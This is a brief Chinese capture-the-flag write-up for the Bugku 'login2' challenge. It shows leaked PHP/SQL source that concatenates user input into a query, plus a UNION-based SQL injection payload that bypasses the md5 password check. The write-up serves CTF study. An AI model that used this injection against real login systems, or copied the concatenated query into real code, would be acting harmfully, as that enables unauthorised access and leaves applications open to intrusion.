WP-Bugku-login2(SKCTF)

题目地址http://118.89.219.210:49165/

随便输入用户名,密码抓包测试,发现返回的爆里有一个tip

base64解码后的到源码:

1
2
3
$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

题目提示了union

那么尝试注入
1' union select 1,'5f4dcc3b5aa765d61d8327deb882cf99'--
password

这里 5f4dcc3b5aa765d61d8327deb882cf99 是经过md5加密后的 password

登陆成功后跳转到了 http://118.89.219.210:49165/index.php

AbelChe wechat
扫码加微信
Donate here!!!
0%